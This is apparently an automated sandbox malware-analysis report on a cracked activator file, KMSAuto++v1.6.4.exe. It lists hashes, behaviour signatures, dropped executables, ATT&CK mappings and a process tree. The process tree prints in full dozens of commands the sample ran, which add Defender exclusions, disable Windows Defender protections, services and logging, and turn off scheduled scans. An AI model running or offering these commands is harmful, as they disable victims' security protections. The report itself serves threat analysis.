Analysis

  • max time kernel
    152s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-es
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-eslocale:es-esos:windows10-2004-x64systemwindows
  • submitted
    06-02-2023 17:00

General

  • Target

    KMSAuto++v1.6.4.exe

  • Size

    718.9MB

  • MD5

    ef8cd375fdc780a87dbf601860994ab9

  • SHA1

    b0aac6fb4006091219ba82a5838e810e0e27beba

  • SHA256

    a6856516f42de63846610b121a0585472e252d40ffcaddba201c3b5fa2abb520

  • SHA512

    52db73a1bc0df076f74ed5fcb4d50ca7e46de6b7ee57cb7ee0223c96635dd01e4cafa403079fdeac25a219d402f5fdca608f76c8ed689540cac0d6c11b44c417

  • SSDEEP

    786432:yo0mvb9vOggaeuNz9jMWZZ7vHMH85G1p14NPlT2sp:yavx2ggaL11MccpyPR2

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\KMSAuto++v1.6.4.exe
    "C:\Users\Admin\AppData\Local\Temp\KMSAuto++v1.6.4.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4472
    • C:\Users\Admin\kms driver.exe
      "C:\Users\Admin\kms driver.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1504
    • C:\Users\Admin\kmsauto++v1.6.4.exe
      "C:\Users\Admin\kmsauto++v1.6.4.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1980
      • C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c copy C:\Windows\system32\Tasks\KMSAuto "C:\Users\Admin\AppData\Local\Temp\KMSAuto.tmp" /Y
        3⤵
          PID:4908
        • C:\Windows\system32\cmd.exe
          "C:\Windows\Sysnative\cmd.exe" /c WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Users\Admin\kmsauto++v1.6.4.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4904
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Users\Admin\kmsauto++v1.6.4.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2036
        • C:\Users\Admin\AppData\Local\Temp\signtool.exe
          "C:\Users\Admin\AppData\Local\Temp\signtool.exe" verify /v /ph /sha1 648384a4dee53d4c1c87e10d67cc99307ccc9c98 "C:\Users\Admin\kmsauto++v1.6.4.exe"
          3⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious use of SetWindowsHookEx
          PID:4004
        • C:\Windows\system32\cmd.exe
          "C:\Windows\Sysnative\cmd.exe" /c WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Users\Admin\KMSAuto_Files"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4360
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Users\Admin\KMSAuto_Files"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1660
        • C:\Windows\system32\cmd.exe
          "C:\Windows\Sysnative\cmd.exe" /c WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\System32\SppExtComObjPatcher.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1932
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\System32\SppExtComObjPatcher.exe"
            4⤵
              PID:2836
          • C:\Windows\system32\cmd.exe
            "C:\Windows\Sysnative\cmd.exe" /c WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\System32\SppExtComObjHook.dll"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2376
            • C:\Windows\System32\Wbem\WMIC.exe
              WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\System32\SppExtComObjHook.dll"
              4⤵
                PID:4372
          • C:\Users\Admin\microsoft tap driver.exe
            "C:\Users\Admin\microsoft tap driver.exe"
            2⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1988
            • C:\Windows\system32\cmd.exe
              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AAEB.tmp\AAEC.tmp\AAED.bat "C:\Users\Admin\microsoft tap driver.exe""
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2780
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                4⤵
                  PID:3540
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                  4⤵
                    PID:3264
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                    4⤵
                      PID:3612
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                      4⤵
                      • Modifies Windows Defender Real-time Protection settings
                      PID:3804
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                      4⤵
                      • Modifies Windows Defender Real-time Protection settings
                      PID:1096
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                      4⤵
                      • Modifies Windows Defender Real-time Protection settings
                      PID:3056
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                      4⤵
                      • Modifies Windows Defender Real-time Protection settings
                      PID:1028
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                      4⤵
                      • Modifies Windows Defender Real-time Protection settings
                      PID:992
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                      4⤵
                        PID:2500
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                        4⤵
                          PID:4196
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                          4⤵
                            PID:4828
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                            4⤵
                              PID:5100
                            • C:\Windows\system32\reg.exe
                              reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                              4⤵
                                PID:3064
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                4⤵
                                  PID:2812
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                  4⤵
                                    PID:1624
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                    4⤵
                                      PID:1556
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                      4⤵
                                        PID:3796
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                        4⤵
                                          PID:4264
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                          4⤵
                                            PID:2316
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                            4⤵
                                              PID:4460
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                              4⤵
                                                PID:2544
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                4⤵
                                                  PID:3676
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                  4⤵
                                                    PID:4680
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                    4⤵
                                                      PID:5092
                                                    • C:\Windows\system32\reg.exe
                                                      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                      4⤵
                                                        PID:4808
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                        4⤵
                                                          PID:4388
                                                        • C:\Windows\system32\reg.exe
                                                          reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                          4⤵
                                                            PID:3176
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                            4⤵
                                                              PID:1628
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                              4⤵
                                                              • Modifies security service
                                                              PID:2020
                                                        • C:\Users\Admin\svchost32.exe
                                                          "C:\Users\Admin\svchost32.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          • Suspicious behavior: AddClipboardFormatListener
                                                          PID:4500

                                                      Network

                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                      Persistence

                                                      Modify Existing Service

                                                      2
                                                      T1031

                                                      Registry Run Keys / Startup Folder

                                                      1
                                                      T1060

                                                      Defense Evasion

                                                      Modify Registry

                                                      4
                                                      T1112

                                                      Disabling Security Tools

                                                      1
                                                      T1089

                                                      Install Root Certificate

                                                      1
                                                      T1130

                                                      Discovery

                                                      Query Registry

                                                      1
                                                      T1012

                                                      System Information Discovery

                                                      2
                                                      T1082

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Users\Admin\AppData\Local\Temp\AAEB.tmp\AAEC.tmp\AAED.bat
                                                        Filesize

                                                        3KB

                                                        MD5

                                                        3a981c51aac5475414f6dea9f4e6ae1a

                                                        SHA1

                                                        90fb6d188c3a6a04f9294fabc71f62635f0c3ea6

                                                        SHA256

                                                        f6498b247cc03e1599bb19fc49dabb923b675bdfb0fd2348f78861842624f809

                                                        SHA512

                                                        a8b49ee8606681f5559d3edddf1708df86f33b9029f140030037d4d2dff40bd288e0c69096be0ead4da4019c0ca5efcf81a33c7405bc82040fe833bb473f0e0b

                                                      • C:\Users\Admin\AppData\Local\Temp\signtool.exe
                                                        Filesize

                                                        323KB

                                                        MD5

                                                        05624e6d27eaef0db0673ae627bd6027

                                                        SHA1

                                                        b155c76bf59992a8d75d0e3a59dc94f24aff2591

                                                        SHA256

                                                        962a92821f54a1e706aa989973130fdc1072c7bd8b9e6d11ea1050b46eb9d313

                                                        SHA512

                                                        233304669aefeec9ad5d19bd2dd5bb19ea35ce31da0b3aabe5ab859259608a58725fac5993637c9635e5912138d3eb477773351f0ee81cc3ce756d713163cf31

                                                      • C:\Users\Admin\AppData\Local\Temp\signtool.exe
                                                        Filesize

                                                        323KB

                                                        MD5

                                                        05624e6d27eaef0db0673ae627bd6027

                                                        SHA1

                                                        b155c76bf59992a8d75d0e3a59dc94f24aff2591

                                                        SHA256

                                                        962a92821f54a1e706aa989973130fdc1072c7bd8b9e6d11ea1050b46eb9d313

                                                        SHA512

                                                        233304669aefeec9ad5d19bd2dd5bb19ea35ce31da0b3aabe5ab859259608a58725fac5993637c9635e5912138d3eb477773351f0ee81cc3ce756d713163cf31

                                                      • C:\Users\Admin\kms driver.exe
                                                        Filesize

                                                        46KB

                                                        MD5

                                                        5f3f77593b1a5bc4e96257a38a8666b1

                                                        SHA1

                                                        532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0

                                                        SHA256

                                                        1b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17

                                                        SHA512

                                                        59b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200

                                                      • C:\Users\Admin\kms driver.exe
                                                        Filesize

                                                        46KB

                                                        MD5

                                                        5f3f77593b1a5bc4e96257a38a8666b1

                                                        SHA1

                                                        532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0

                                                        SHA256

                                                        1b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17

                                                        SHA512

                                                        59b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200

                                                      • C:\Users\Admin\kmsauto++v1.6.4.exe
                                                        Filesize

                                                        17.2MB

                                                        MD5

                                                        f047284bfddc942292d93ed86fdb20fd

                                                        SHA1

                                                        56dc945674cf4f941cf17a9ac9c1c9718cf9d18e

                                                        SHA256

                                                        793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46

                                                        SHA512

                                                        2ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513

                                                      • C:\Users\Admin\kmsauto++v1.6.4.exe
                                                        Filesize

                                                        17.2MB

                                                        MD5

                                                        f047284bfddc942292d93ed86fdb20fd

                                                        SHA1

                                                        56dc945674cf4f941cf17a9ac9c1c9718cf9d18e

                                                        SHA256

                                                        793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46

                                                        SHA512

                                                        2ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513

                                                      • C:\Users\Admin\microsoft tap driver.exe
                                                        Filesize

                                                        59KB

                                                        MD5

                                                        e0b6a8a56069214d6dc31a2c053f73f7

                                                        SHA1

                                                        3eb13ab2e49014437c904f8ada2d22a85fd503e4

                                                        SHA256

                                                        4318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9

                                                        SHA512

                                                        080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68

                                                      • C:\Users\Admin\microsoft tap driver.exe
                                                        Filesize

                                                        59KB

                                                        MD5

                                                        e0b6a8a56069214d6dc31a2c053f73f7

                                                        SHA1

                                                        3eb13ab2e49014437c904f8ada2d22a85fd503e4

                                                        SHA256

                                                        4318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9

                                                        SHA512

                                                        080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68

                                                      • C:\Users\Admin\svchost32.exe
                                                        Filesize

                                                        533KB

                                                        MD5

                                                        4ec113ac1f8e7d4dda1270cc8bb00efc

                                                        SHA1

                                                        7a33598cab86959e8a3001ef0a2a756514de3aed

                                                        SHA256

                                                        7f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad

                                                        SHA512

                                                        28954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2

                                                      • C:\Users\Admin\svchost32.exe
                                                        Filesize

                                                        533KB

                                                        MD5

                                                        4ec113ac1f8e7d4dda1270cc8bb00efc

                                                        SHA1

                                                        7a33598cab86959e8a3001ef0a2a756514de3aed

                                                        SHA256

                                                        7f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad

                                                        SHA512

                                                        28954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2

                                                      • memory/992-176-0x0000000000000000-mapping.dmp
                                                      • memory/1028-175-0x0000000000000000-mapping.dmp
                                                      • memory/1096-172-0x0000000000000000-mapping.dmp
                                                      • memory/1504-149-0x00000000021F0000-0x0000000002212000-memory.dmp
                                                        Filesize

                                                        136KB

                                                      • memory/1504-132-0x0000000000000000-mapping.dmp
                                                      • memory/1504-141-0x000000001C970000-0x000000001CA72000-memory.dmp
                                                        Filesize

                                                        1.0MB

                                                      • memory/1504-142-0x00007FFC2DFE0000-0x00007FFC2EAA1000-memory.dmp
                                                        Filesize

                                                        10.8MB

                                                      • memory/1504-161-0x00007FFC2DFE0000-0x00007FFC2EAA1000-memory.dmp
                                                        Filesize

                                                        10.8MB

                                                      • memory/1504-153-0x00000000021C0000-0x00000000021CA000-memory.dmp
                                                        Filesize

                                                        40KB

                                                      • memory/1504-136-0x000000001B820000-0x000000001B8A2000-memory.dmp
                                                        Filesize

                                                        520KB

                                                      • memory/1504-154-0x00000000021D0000-0x00000000021DA000-memory.dmp
                                                        Filesize

                                                        40KB

                                                      • memory/1504-135-0x00000000001A0000-0x00000000001AE000-memory.dmp
                                                        Filesize

                                                        56KB

                                                      • memory/1556-186-0x0000000000000000-mapping.dmp
                                                      • memory/1624-185-0x0000000000000000-mapping.dmp
                                                      • memory/1628-198-0x0000000000000000-mapping.dmp
                                                      • memory/1660-167-0x0000000000000000-mapping.dmp
                                                      • memory/1932-169-0x0000000000000000-mapping.dmp
                                                      • memory/1980-155-0x0000000000400000-0x0000000001713000-memory.dmp
                                                        Filesize

                                                        19.1MB

                                                      • memory/1980-137-0x0000000000000000-mapping.dmp
                                                      • memory/1980-201-0x0000000000400000-0x0000000001713000-memory.dmp
                                                        Filesize

                                                        19.1MB

                                                      • memory/1988-140-0x0000000000000000-mapping.dmp
                                                      • memory/1988-145-0x0000000000400000-0x000000000041F000-memory.dmp
                                                        Filesize

                                                        124KB

                                                      • memory/1988-200-0x0000000000400000-0x000000000041F000-memory.dmp
                                                        Filesize

                                                        124KB

                                                      • memory/2020-199-0x0000000000000000-mapping.dmp
                                                      • memory/2036-159-0x0000000000000000-mapping.dmp
                                                      • memory/2316-189-0x0000000000000000-mapping.dmp
                                                      • memory/2376-178-0x0000000000000000-mapping.dmp
                                                      • memory/2500-177-0x0000000000000000-mapping.dmp
                                                      • memory/2544-191-0x0000000000000000-mapping.dmp
                                                      • memory/2780-152-0x0000000000000000-mapping.dmp
                                                      • memory/2812-184-0x0000000000000000-mapping.dmp
                                                      • memory/2836-173-0x0000000000000000-mapping.dmp
                                                      • memory/3056-174-0x0000000000000000-mapping.dmp
                                                      • memory/3064-183-0x0000000000000000-mapping.dmp
                                                      • memory/3176-197-0x0000000000000000-mapping.dmp
                                                      • memory/3264-164-0x0000000000000000-mapping.dmp
                                                      • memory/3540-162-0x0000000000000000-mapping.dmp
                                                      • memory/3612-168-0x0000000000000000-mapping.dmp
                                                      • memory/3676-192-0x0000000000000000-mapping.dmp
                                                      • memory/3796-187-0x0000000000000000-mapping.dmp
                                                      • memory/3804-171-0x0000000000000000-mapping.dmp
                                                      • memory/4004-156-0x0000000000000000-mapping.dmp
                                                      • memory/4196-179-0x0000000000000000-mapping.dmp
                                                      • memory/4264-188-0x0000000000000000-mapping.dmp
                                                      • memory/4360-163-0x0000000000000000-mapping.dmp
                                                      • memory/4372-182-0x0000000000000000-mapping.dmp
                                                      • memory/4388-196-0x0000000000000000-mapping.dmp
                                                      • memory/4460-190-0x0000000000000000-mapping.dmp
                                                      • memory/4500-165-0x0000000000983000-0x00000000009E6000-memory.dmp
                                                        Filesize

                                                        396KB

                                                      • memory/4500-166-0x0000000000890000-0x00000000008FD000-memory.dmp
                                                        Filesize

                                                        436KB

                                                      • memory/4500-148-0x0000000000000000-mapping.dmp
                                                      • memory/4500-170-0x0000000000400000-0x0000000000886000-memory.dmp
                                                        Filesize

                                                        4.5MB

                                                      • memory/4680-193-0x0000000000000000-mapping.dmp
                                                      • memory/4808-195-0x0000000000000000-mapping.dmp
                                                      • memory/4828-180-0x0000000000000000-mapping.dmp
                                                      • memory/4904-147-0x0000000000000000-mapping.dmp
                                                      • memory/4908-146-0x0000000000000000-mapping.dmp
                                                      • memory/5092-194-0x0000000000000000-mapping.dmp
                                                      • memory/5100-181-0x0000000000000000-mapping.dmp